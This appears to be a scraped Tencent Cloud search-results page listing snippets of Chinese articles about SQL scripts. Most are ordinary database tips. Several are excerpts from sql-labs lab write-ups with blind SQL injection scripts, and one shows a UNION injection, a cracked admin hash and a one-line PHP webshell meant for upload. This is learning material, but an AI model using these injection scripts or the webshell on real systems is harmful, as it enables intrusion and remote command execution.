- 综合排序
- 最热优先
- 最新优先
- 来自专栏网安菜鸟成长记
sql-labs-less9less10|脚本SQL时间盲注
前言: 此系列为sql-labs第9关和第10关,两关差别不大,这一关使用sql时间盲注的方法,写脚本进行注入,前面的关卡没有用过时间盲注,所以这一关讲的比较详细,如果错误的地方还请大佬指正! 正文: less9: 本关无论注入正确与否页面都显示一样的回显,所以无法像第八关那样通过查看页面是否输出语句来判断注入的语句是否正确执行,这一关使用时间盲注方法 请看代码: import requests import time import datetime url = "http://localhost/sql-labs/Less-9/? difference > 1: flag += chr(k) print("flag为->"+flag) get_flag() 跟第八关的脚本差不多 ,只是使用的注入语句有点差别,涉及到第八关的脚本详解这里不在多说,如果有不懂的请看第八关详解sql-labs-less8详解注入语句只是比第八关多了if语句 **if函数:**这是MySQL内置的函数
2.3K31发布于 2020-10-28 - 来自专栏wuming_CTF
Sql注入脚本
---- 自增脚本 # coding:utf-8 import requests import datetime import time # 获取数据库名长度 def database_len() break print('database_len:', i) #获取数据库名 def database_name(): name = '' for j in range(1,9) break print('database_name:', name) if __name__ == '__main__': database_name() 二分法脚本
1.1K20发布于 2021-01-21 - 来自专栏捞月亮的小北
9. 动态SQL
Mybaits 框架的动态 SQL 技术是一种根据特定条件动态拼接 SQL 语句的功能 , 它存在的意义是为了解决拼接 SQL 语句字符串时的痛点问题 Mybatis 中动态 SQL 怎么理解? 同时,也需要注意 SQL 注入和动态 SQL 的维护难度问题。 SQL 片段的作用是将常用的 SQL 语句封装成一个可重用的组件,方便在多个地方使用。 Mybatis 中的 SQL 片段有两种类型: 动态 SQL 片段:根据不同的条件生成不同的 SQL 语句。 6.2 SQL 片段的作用 SQL 片段(SQL Fragments)是 Mybatis 中一个重要的功能,它的作用是将一段 SQL 片段用 <sql> 元素封装,并在需要的地方通过 <include 减小 SQL 的维护难度:将一段 SQL 代码封装成 SQL 片段,可以方便维护和修改,避免了对 SQL 语句的重复修改和维护。
53910编辑于 2023-12-01 - 来自专栏SQL数据库开发
SQL常用脚本整理
工作中有许多比较常用的SQL脚本,今天开始分几章分享给大家。 5、把多行SQL数据变成一条多列数据,即新增列 SELECT id, name, SUM(CASE WHEN quarter=1 THEN number ELSE 0 END) '一季度 'SQLOLEDB', '192.168.0.1'; 'sa'; 'password', 'SELECT * FROM dbo.test') 当然也可以参考以前的示例,建立DBLINK进行远程连接 9、 102 yy.mm.dd 103 dd/mm/yy 104 dd.mm.yy 105 dd-mm-yy 106 dd mon yy 107 Mon dd, yy 108 hh:mm:ss 109 或者 9 :ss:mmmAM 131 dd/mm/yy hh:mi:ss:mmmAM SELECT CONVERT(varchar(100), GETDATE(), 0) --结果: 12 7 2020 9:
74811编辑于 2024-04-25 - 来自专栏吾非同
SQL 常用脚本整理
常用功能脚本 1.导出整个数据库 1mysqldump -u 用户名 -p –default-character-set=latin1 数据库名 > 导出的文件名(数据库默认编码是latin1) source命令,后面参数为脚本文件(如这里用到的.sql) 10 11mysql>source wcnc_db.sql 12 13B:使用mysqldump命令 14 15mysqldump 4 5导入auction.sql文件 6 7c:mysqlbin>mysql -u root -p auction < auction.sql。 8 9通过以上操作,就可以创建了一个数据库auction以及其中的一个表auction。 导入.sql文件命令(例如D:/mysql.sql) mysql>use database; mysql>source d:/mysql.sql; 10:删除表 mysql>drop TABLE
98830发布于 2021-11-09 - 来自专栏GitHub专栏
SQL 常用脚本整理
常用功能脚本 ---- 1.导出整个数据库 1mysqldump -u 用户名 -p –default-character-set=latin1 数据库名 > 导出的文件名(数据库默认编码是latin1 source命令,后面参数为脚本文件(如这里用到的.sql) 10 11mysql>source wcnc_db.sql 12 13B:使用mysqldump命令 14 15mysqldump 4 5导入auction.sql文件 6 7c:mysqlbin>mysql -u root -p auction < auction.sql。 8 9通过以上操作,就可以创建了一个数据库auction以及其中的一个表auction。 导入.sql文件命令(例如D:/mysql.sql) mysql>use database; mysql>source d:/mysql.sql; 10:删除表 mysql>drop TABLE
76810发布于 2021-11-10 - 来自专栏pangguoming
PowerDesigner导入SQL脚本
.; 选择好DBMS(数据库管理系统)类型;然后点击确定按钮;这里演示选中的是mysql数据库,具体类型根据自己需要选择; 点击Add Files 图标添加脚本 ; 找到要导入的sql脚本,鼠标单击打开按钮; 鼠标单击,确定按钮; 开始反向工程生成数据库.....
2.3K50发布于 2018-03-09 - 来自专栏程序猿
SQL Server基础SQL脚本之Group By
代码大概80行左右 本系列,几乎都是代码,记得当时写的时候用的是微软的官方实例数据库AdventureWorks_Data.mdf、AdventureWorks_Log.ldf来运行的。 下载链接:
1.5K50发布于 2018-03-09 - 来自专栏入门小站
9个日常实用 Shell 脚本
information_schema|mysql|performance_schema|sys") for DB in $DB_LIST; do BACKUP_NAME=$BACKUP_DIR/${DB}_${DATE}.sql tables;" 2>/dev/null) for TABLE in $TABLE_LIST; do BACKUP_NAME=$BACKUP_DB_DIR/${TABLE}.sql ++}END{for(v in a){if(a[v]>5)print v,a[v]}}' 7、查看网卡实时流量脚本 #! # 禁用selinux sed -i '/SELINUX/{s/permissive/disabled/}' /etc/selinux/config # 关闭防火墙 if egrep "7.[0-9] 监控 100 台服务器磁盘利用率脚本 #!
39510编辑于 2022-06-03 - 来自专栏乐沙弥的世界
LinuxUnix shell 脚本中调用SQL,RMAN脚本
本文针对Linux/Unix shell脚本调用sql, rman 脚本给出了相关示例。 一、由shell脚本调用sql,rman脚本 1、shell脚本调用sql脚本 #首先编辑sql文件 oracle@SZDB:~> more dept.sql connect scott/tiger spool 脚本内调用sql脚本 oracle@SZDB:~> more get_dept.sh #! /rman_bak.sh 二、嵌入sql语句及rman到shell脚本 1、直接将sql语句嵌入到shell脚本 oracle@SZDB:~> more get_dept_2.sh #! /rman_bak_2.sh RMAN> RMAN> 2> 3> 4> 5> 6> 7> 8> 9> 10> 11> 12> 13> 14> 15> 16> 17> 18> 19> 20> 21> RMAN
1.7K10发布于 2018-08-14 - 来自专栏开源部署
9个常用的Shell脚本
information_schema|mysql|performance_schema|sys")for DB in $DB_LIST; do BACKUP_NAME=$BACKUP_DIR/${DB}_${DATE}.sql show tables;" 2>/dev/null) for TABLE in $TABLE_LIST; do BACKUP_NAME=$BACKUP_DB_DIR/${TABLE}.sql print v,a[v]}}' $LOG_FILE |sort -k2 -nrecho "----------------------"echo "统计访问页面状态码数量"awk '{a[$7" "$9] ++}END{for(v in a){if(a[v]>5)print v,a[v]}}'7、查看网卡实时流量脚本#! 监控 100 台服务器磁盘利用率脚本#!
32310编辑于 2022-06-25 - 来自专栏网安菜鸟成长记
sql-labs-less26a|sql注入(脚本)
前言: 本关为sql-labs系列less26a,此系列持续更新,前面的关卡可以查看我前面的文章,本关使用bool盲注的方法用脚本跑,如有错误的地方欢迎师傅指正。 方法跟前面的9、10关差不多,直接放脚本: import requests import time import datetime url = "http://localhost/sqli-labs-master difference > 1: flag += chr(k) print("flag为->"+flag) get_flag() 可以自己参考脚本 ,脚本详细细节可以访问sql-labs-less9/less10,感谢支持!
1.4K20发布于 2020-10-28 9个SQL优化技巧
大多数的接口性能问题,很多情况下都是SQL问题,在工作中,我们也会定期对慢SQL进行优化,以提高接口性能。这里总结一下常见的优化方向和策略。 避免使用select *,减少查询字段不要为了图省事,直接查询全部的字段,尽量查需要的字段,特别是复杂的SQL,能够避免很多不走索引的情况。这也是最基本的方法。 避免使用左模糊查询在工作中,对于姓名、手机号、名称等内容,经常会遇到模糊查询的场景,但是要尽量避免左模糊,这种SQL无法使用索引。 join的优化JOIN 是 SQL 查询中的一个操作,用于将两个或多个表连接在一起。JOIN 操作有几种类型,包括 LEFT JOIN、RIGHT JOIN 和 INNER JOIN。 我们日常使用较多的分页一般是用的PageHelper插件,SQL如下:sql复制代码select id,name from table_name where N个条件 limit 100000,10;它的执行流程
1.4K10编辑于 2024-05-21- 来自专栏NetCore
用Sql生成数据插入Sql脚本
@tablename sysname AS declare @column varchar(1000) declare @columndata varchar(1000) declare @sql if @@fetch_status < >-2 begin if @xtype not in(189,34,35,99,98) --timestamp不需处理,image,text,ntext,sql_variant syscolumns_cursor into @name,@xtype end close syscolumns_cursor deallocate syscolumns_cursor set @sql '+@tablename+'('+@column+') values(''as ''--'','+@columndata+','')'' from '+@tablename print '--'+@sql exec(@sql) if @ident is not null print 'SET IDENTITY_INSERT '+@TableName+' OFF' GO exec UspOutputData
1.6K70发布于 2018-02-01 - 来自专栏SQL数据库开发
21个SQL实用脚本
SQL面试专栏 SQL145题系列 工作中有许多比较常用的SQL脚本,今天开始分几章分享给大家。 ' DBCC FLUSHPROCINDB (@dbid) 18、SQL换行 SQL的换行 制表符 CHAR(9) 换行符 CHAR(10) 回车 CHAR(13) PRINT 'SQL'+CHAR(13 )+'ROAD' PRINT 'SQL'+CHAR(10)+'ROAD' PRINT 'SQL'+CHAR(9)+'ROAD' 执行结果: 如果将查询结果以文本格式显示,而不是网格格式显示,SELECT '+ convert(varchar(10),datediff(ms,@timediff,getdate())) 结果如下: 在状态栏是不会精确到毫秒的,只能精确到秒 这个脚本可以更加有效的查看SQL代码的执行效率 以上就是今天分享给大家一些比较实用的SQL脚本,以后想到了其他内容再分享给大家,好东西记得分享转发呀~
79810编辑于 2024-04-25 - 来自专栏啄木鸟软件测试
从SQL注入到脚本
如果要使用正则表达式轻松地从结果页检索信息(例如,如果要编写SQL注入脚本),可以在注入中使用标记:``1 UNION SELECT 1,concat('^^^',table_name,':',column_name admin:8efe310f9ab3efeae8d410a8e0166eb2 可以使用以下命令行破解以前检索到的密码: $ . 我们可以看到,有一个文件上传功能允许用户上传图片,我们可以使用此功能尝试上传PHP脚本。这个PHP脚本一旦上传到服务器上,将为我们提供一种运行PHP代码和命令的方法。 首先,我们需要创建一个PHP脚本来运行命令。下面是一个简单且最小的webshell的源代码: <? system($_GET['cmd']); ?> 此脚本获取参数cmd的内容并执行它。 我们现在可以使用页面上提供的上载功能:http://vulnerable/admin/new.php并尝试上载此脚本。 我们可以看到,脚本没有正确上传到服务器上。应用程序阻止扩展名为的文件。
3.1K10编辑于 2022-09-23 - 来自专栏凹凸玩数据
Pandas直接读取sql脚本
之前有群友反应同事给了他一个几百MB的sql脚本,导入数据库再从数据库读取数据有点慢,想了解下有没有可以直接读取sql脚本到pandas的方法。 01 解析sql脚本文本文件替换成csv格式并加载 我考虑了一下sql脚本也就只是一个文本文件而已,而且只有几百MB,现代的机器足以把它一次性全部加载到内存中,使用python来处理也不会太慢。 我简单研究了一下sql脚本的导出格式,并根据格式写出了以下sql脚本的读取方法。 注意:该读取方法只针对SQLyog导出的mysql脚本测试,其他数据库可能代码需要根据实际情况微调。 :sql脚本的位置 quotechar:脚本中字符串是单引号还是双引号,默认使用单引号解析 返回: 一个字典,键是表名,值是该表对应的数据所组成的datafream对象 下面我测试读取下面这个sql脚本 02 将sql脚本转换为sqlite格式并通过本地sql连接读取 在写完上面的方法后,我又想到另一种解决思路,就是将sql脚本转换成sqlite语法的sql语句,然后直接加载。
1.9K20发布于 2021-02-05 - 来自专栏一个爱吃西瓜的程序员
学习SQL【9】-集合与联结
现在我们开始学习使用2张以上的表的SQL语句。通过以行方向为单位的集合运算符和以列方向为单位的联结,就可以将分散在多张表中的数据组合成期望的结果。 SQL中的联结有很多种,我们主要学习内联结和外联结两种。 内联结—INNER JOIN 内联结(INNER JOIN)是运用最广泛的联结运算。 SP.shop_name, SP.product_id, P.product_name FROM ShopProduct AS SP CROSS JOIN Product AS P; 上述的SQL
1.5K120发布于 2018-04-04 - 来自专栏程序猿
SQL Server基础SQL脚本之主外键约束
between 27 and 80), sex int check(sex in('M','F')), tel nvarchar(20) check(tel like'1[3,5,7,8][0-9] [0-9][0-9][0-9][0-9][0-9][0-9] [0-9][0-9]') ) create table b2( f nvarchar(10) ) create
1.8K60发布于 2018-03-09 - 来自专栏程序猿
SQL Server基础SQL脚本之创建架构、排序
2014-09-06' select @a as 'datatime' declare @i numeric(4,2) set @i=12.56 select @i as [numeric] --sql ----------------- update Emp set Title ='C' output inserted.* ,'-----' , deleted.* where EID=9
1.9K80发布于 2018-03-09
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号